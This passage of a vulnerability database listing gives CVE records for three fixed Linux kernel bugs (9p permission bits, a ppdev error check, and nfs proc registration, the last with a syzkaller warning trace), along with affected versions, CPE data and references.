"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/9p: only translate RWX permissions for plain 9P2000\n\nGarbage in plain 9P2000\u0027s perm bits is allowed through, which causes it\nto be able to set (among others) the suid bit. This was presumably not\nthe intent since the unix extended bits are handled explicitly and\nconditionally on .u."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:57.344Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e90bc596a74bb905e0a45bf346038c3f9d1e868d"
},
{
"url": "https://git.kernel.org/stable/c/df1962a199783ecd66734d563caf0fedecf08f96"
},
{
"url": "https://git.kernel.org/stable/c/5a605930e19f451294bd838754f7d66c976a8a2c"
},
{
"url": "https://git.kernel.org/stable/c/ad4f65328661392de74e3608bb736fedf3b67e32"
},
{
"url": "https://git.kernel.org/stable/c/ca9b5c81f0c918c63d73d962ed8a8e231f840bc8"
},
{
"url": "https://git.kernel.org/stable/c/e55c601af3b1223a84f9f27f9cdbd2af5e203bf3"
},
{
"url": "https://git.kernel.org/stable/c/157d468e34fdd3cb1ddc07c2be32fb3b02826b02"
},
{
"url": "https://git.kernel.org/stable/c/cd25e15e57e68a6b18dc9323047fe9c68b99290b"
}
],
"title": "fs/9p: only translate RWX permissions for plain 9P2000",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36964",
"datePublished": "2024-06-03T07:50:01.987Z",
"dateReserved": "2024-05-30T15:25:07.081Z",
"dateUpdated": "2025-05-04T09:12:57.344Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36015 (GCVE-0-2024-36015)
Vulnerability from cvelistv5
Published
2024-05-29 07:35
Modified
2025-11-04 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ppdev: Add an error check in register_device
In register_device, the return value of ida_simple_get is unchecked,
in witch ida_simple_get will use an invalid index value.
To address this issue, index should be checked after ida_simple_get. When
the index value is abnormal, a warning message should be printed, the port
should be dropped, and the value should be recorded.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9a69645dde1188723d80745c1bc6ee9af2cbe2a7 Version: 9a69645dde1188723d80745c1bc6ee9af2cbe2a7 Version: 9a69645dde1188723d80745c1bc6ee9af2cbe2a7 Version: 9a69645dde1188723d80745c1bc6ee9af2cbe2a7 Version: 9a69645dde1188723d80745c1bc6ee9af2cbe2a7 Version: 9a69645dde1188723d80745c1bc6ee9af2cbe2a7 Version: 9a69645dde1188723d80745c1bc6ee9af2cbe2a7 Version: 9a69645dde1188723d80745c1bc6ee9af2cbe2a7 Version: 9c2b46e720d5b083268ca0131f513a90696f3a82 Version: 762602796be626cbb6b3a6573e00b9ee7db00c97 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:56.337Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/65cd017d43f4319a56747d38308b0a24cf57299e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b8c6b83cc3adff3ddf403c8c7063fe6d08b2b9d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d32caf51379a4d71db03d3d4d7c22d27cdf7f68b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b65d0410b879af0295d22438a4a32012786d152a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df9329247dbbf00f6057e002139ab3fa529ad828"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec3468221efec6660ff656e9ebe51ced3520fc57"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5d5b24edad1107a2ffa99058f20f6aeeafeb5d39"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fbf740aeb86a4fe82ad158d26d711f2f3be79b3e"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36015",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:35:04.733410Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:50.751Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/char/ppdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "65cd017d43f4319a56747d38308b0a24cf57299e",
"status": "affected",
"version": "9a69645dde1188723d80745c1bc6ee9af2cbe2a7",
"versionType": "git"
},
{
"lessThan": "b8c6b83cc3adff3ddf403c8c7063fe6d08b2b9d9",
"status": "affected",
"version": "9a69645dde1188723d80745c1bc6ee9af2cbe2a7",
"versionType": "git"
},
{
"lessThan": "d32caf51379a4d71db03d3d4d7c22d27cdf7f68b",
"status": "affected",
"version": "9a69645dde1188723d80745c1bc6ee9af2cbe2a7",
"versionType": "git"
},
{
"lessThan": "b65d0410b879af0295d22438a4a32012786d152a",
"status": "affected",
"version": "9a69645dde1188723d80745c1bc6ee9af2cbe2a7",
"versionType": "git"
},
{
"lessThan": "df9329247dbbf00f6057e002139ab3fa529ad828",
"status": "affected",
"version": "9a69645dde1188723d80745c1bc6ee9af2cbe2a7",
"versionType": "git"
},
{
"lessThan": "ec3468221efec6660ff656e9ebe51ced3520fc57",
"status": "affected",
"version": "9a69645dde1188723d80745c1bc6ee9af2cbe2a7",
"versionType": "git"
},
{
"lessThan": "5d5b24edad1107a2ffa99058f20f6aeeafeb5d39",
"status": "affected",
"version": "9a69645dde1188723d80745c1bc6ee9af2cbe2a7",
"versionType": "git"
},
{
"lessThan": "fbf740aeb86a4fe82ad158d26d711f2f3be79b3e",
"status": "affected",
"version": "9a69645dde1188723d80745c1bc6ee9af2cbe2a7",
"versionType": "git"
},
{
"status": "affected",
"version": "9c2b46e720d5b083268ca0131f513a90696f3a82",
"versionType": "git"
},
{
"status": "affected",
"version": "762602796be626cbb6b3a6573e00b9ee7db00c97",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/char/ppdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.10.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nppdev: Add an error check in register_device\n\nIn register_device, the return value of ida_simple_get is unchecked,\nin witch ida_simple_get will use an invalid index value.\n\nTo address this issue, index should be checked after ida_simple_get. When\nthe index value is abnormal, a warning message should be printed, the port\nshould be dropped, and the value should be recorded."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:16.022Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/65cd017d43f4319a56747d38308b0a24cf57299e"
},
{
"url": "https://git.kernel.org/stable/c/b8c6b83cc3adff3ddf403c8c7063fe6d08b2b9d9"
},
{
"url": "https://git.kernel.org/stable/c/d32caf51379a4d71db03d3d4d7c22d27cdf7f68b"
},
{
"url": "https://git.kernel.org/stable/c/b65d0410b879af0295d22438a4a32012786d152a"
},
{
"url": "https://git.kernel.org/stable/c/df9329247dbbf00f6057e002139ab3fa529ad828"
},
{
"url": "https://git.kernel.org/stable/c/ec3468221efec6660ff656e9ebe51ced3520fc57"
},
{
"url": "https://git.kernel.org/stable/c/5d5b24edad1107a2ffa99058f20f6aeeafeb5d39"
},
{
"url": "https://git.kernel.org/stable/c/fbf740aeb86a4fe82ad158d26d711f2f3be79b3e"
}
],
"title": "ppdev: Add an error check in register_device",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36015",
"datePublished": "2024-05-29T07:35:04.506Z",
"dateReserved": "2024-05-17T13:50:33.154Z",
"dateUpdated": "2025-11-04T17:20:56.337Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-36939 (GCVE-0-2024-36939)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfs: Handle error of rpc_proc_register() in nfs_net_init().
syzkaller reported a warning [0] triggered while destroying immature
netns.
rpc_proc_register() was called in init_nfs_fs(), but its error
has been ignored since at least the initial commit 1da177e4c3f4
("Linux-2.6.12-rc2").
Recently, commit d47151b79e32 ("nfs: expose /proc/net/sunrpc/nfs
in net namespaces") converted the procfs to per-netns and made
the problem more visible.
Even when rpc_proc_register() fails, nfs_net_init() could succeed,
and thus nfs_net_exit() will be called while destroying the netns.
Then, remove_proc_entry() will be called for non-existing proc
directory and trigger the warning below.
Let's handle the error of rpc_proc_register() properly in nfs_net_init().
[0]:
name 'nfs'
WARNING: CPU: 1 PID: 1710 at fs/proc/generic.c:711 remove_proc_entry+0x1bb/0x2d0 fs/proc/generic.c:711
Modules linked in:
CPU: 1 PID: 1710 Comm: syz-executor.2 Not tainted 6.8.0-12822-gcd51db110a7e #12
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014
RIP: 0010:remove_proc_entry+0x1bb/0x2d0 fs/proc/generic.c:711
Code: 41 5d 41 5e c3 e8 85 09 b5 ff 48 c7 c7 88 58 64 86 e8 09 0e 71 02 e8 74 09 b5 ff 4c 89 e6 48 c7 c7 de 1b 80 84 e8 c5 ad 97 ff <0f> 0b eb b1 e8 5c 09 b5 ff 48 c7 c7 88 58 64 86 e8 e0 0d 71 02 eb
RSP: 0018:ffffc9000c6d7ce0 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8880422b8b00 RCX: ffffffff8110503c
RDX: ffff888030652f00 RSI: ffffffff81105045 RDI: 0000000000000001
RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000001 R11: ffffffff81bb62cb R12: ffffffff84807ffc
R13: ffff88804ad6fcc0 R14: ffffffff84807ffc R15: ffffffff85741ff8
FS: 00007f30cfba8640(0000) GS:ffff88807dd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007ff51afe8000 CR3: 000000005a60a005 CR4: 0000000000770ef0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
<TASK>
rpc_proc_unregister+0x64/0x70 net/sunrpc/stats.c:310
nfs_net_exit+0x1c/0x30 fs/nfs/inode.c:2438
ops_exit_list+0x62/0xb0 net/core/net_namespace.c:170
setup_net+0x46c/0x660 net/core/net_namespace.c:372
copy_net_ns+0x244/0x590 net/core/net_namespace.c:505
create_new_namespaces+0x2ed/0x770 kernel/nsproxy.c:110
unshare_nsproxy_namespaces+0xae/0x160 kernel/nsproxy.c:228
ksys_unshare+0x342/0x760 kernel/fork.c:3322
__do_sys_unshare kernel/fork.c:3393 [inline]
__se_sys_unshare kernel/fork.c:3391 [inline]
__x64_sys_unshare+0x1f/0x30 kernel/fork.c:3391
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x4f/0x110 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x46/0x4e
RIP: 0033:0x7f30d0febe5d
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48
RSP: 002b:00007f30cfba7cc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000110
RAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f30d0febe5d
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 000000006c020600
RBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000002
R13: 000000000000000b R14: 00007f30d104c530 R15: 0000000000000000
</TASK>
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36939",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-03T18:55:43.324430Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:06.262Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.092Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b33ca18c3a1190208dfd569c4fa8a2f93084709f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d4891d817350c67392d4731536945f3809a2a0ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea6ce93327bd2c8a0c6cf6f2f0e800f3b778f021"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ae63bd858691bee0e2a92571f2fbb36a4d86d65"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a1f89c98dcc542dd6d287e573523714702e0f9c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9909dde2e53a19585212c32fe3eda482b5faaaa3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24457f1be29f1e7042e50a7749f5c2dde8c433c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nfs/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b33ca18c3a1190208dfd569c4fa8a2f93084709f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d4891d817350c67392d4731536945f3809a2a0ba",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ea6ce93327bd2c8a0c6cf6f2f0e800f3b778f021",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8ae63bd858691bee0e2a92571f2fbb36a4d86d65",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8a1f89c98dcc542dd6d287e573523714702e0f9c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9909dde2e53a19585212c32fe3eda482b5faaaa3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "24457f1be29f1e7042e50a7749f5c2dde8c433c8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nfs/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfs: Handle error of rpc_proc_register() in nfs_net_init().\n\nsyzkaller reported a warning [0] triggered while destroying immature\nnetns.\n\nrpc_proc_register() was called in init_nfs_fs(), but its error\nhas been ignored since at least the initial commit 1da177e4c3f4\n(\"Linux-2.6.12-rc2\").\n\nRecently, commit d47151b79e32 (\"nfs: expose /proc/net/sunrpc/nfs\nin net namespaces\") converted the procfs to per-netns and made\nthe problem more visible.\n\nEven when rpc_proc_register() fails, nfs_net_init() could succeed,\nand thus nfs_net_exit() will be called while destroying the netns.\n\nThen, remove_proc_entry() will be called for non-existing proc\ndirectory and trigger the warning below.\n\nLet\u0027s handle the error of rpc_proc_register() properly in nfs_net_init().\n\n[0]:\nname \u0027nfs\u0027\nWARNING: CPU: 1 PID: 1710 at fs/proc/generic.c:711 remove_proc_entry+0x1bb/0x2d0 fs/proc/generic.c:711\nModules linked in:\nCPU: 1 PID: 1710 Comm: syz-executor.2 Not tainted 6.8.0-12822-gcd51db110a7e #12\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nRIP: 0010:remove_proc_entry+0x1bb/0x2d0 fs/proc/generic.c:711\nCode: 41 5d 41 5e c3 e8 85 09 b5 ff 48 c7 c7 88 58 64 86 e8 09 0e 71 02 e8 74 09 b5 ff 4c 89 e6 48 c7 c7 de 1b 80 84 e8 c5 ad 97 ff \u003c0f\u003e 0b eb b1 e8 5c 09 b5 ff 48 c7 c7 88 58 64 86 e8 e0 0d 71 02 eb\nRSP: 0018:ffffc9000c6d7ce0 EFLAGS: 00010286\nRAX: 0000000000000000 RBX: ffff8880422b8b00 RCX: ffffffff8110503c\nRDX: ffff888030652f00 RSI: ffffffff81105045 RDI: 0000000000000001\nRBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000\nR10: 0000000000000001 R11: ffffffff81bb62cb R12: ffffffff84807ffc\nR13: ffff88804ad6fcc0 R14: ffffffff84807ffc R15: ffffffff85741ff8\nFS: 00007f30cfba8640(0000) GS:ffff88807dd00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ff51afe8000 CR3: 000000005a60a005 CR4: 0000000000770ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n rpc_proc_unregister+0x64/0x70 net/sunrpc/stats.c:310\n nfs_net_exit+0x1c/0x30 fs/nfs/inode.c:2438\n ops_exit_list+0x62/0xb0 net/core/net_namespace.c:170\n setup_net+0x46c/0x660 net/core/net_namespace.c:372\n copy_net_ns+0x244/0x590 net/core/net_namespace.c:505\n create_new_namespaces+0x2ed/0x770 kernel/nsproxy.c:110\n unshare_nsproxy_namespaces+0xae/0x160 kernel/nsproxy.c:228\n ksys_unshare+0x342/0x760 kernel/fork.c:3322\n __do_sys_unshare kernel/fork.c:3393 [inline]\n __se_sys_unshare kernel/fork.c:3391 [inline]\n __x64_sys_unshare+0x1f/0x30 kernel/fork.c:3391\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x4f/0x110 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x46/0x4e\nRIP: 0033:0x7f30d0febe5d\nCode: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48\nRSP: 002b:00007f30cfba7cc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000110\nRAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f30d0febe5d\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 000000006c020600\nRBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000002\nR13: 000000000000000b R14: 00007f30d104c530 R15: 0000000000000000\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:28.626Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b33ca18c3a1190208dfd569c4fa8a2f93084709f"
},
{
"url": "https://git.kernel.org/stable/c/d4891d817350c67392d4731536945f3809a2a0ba"
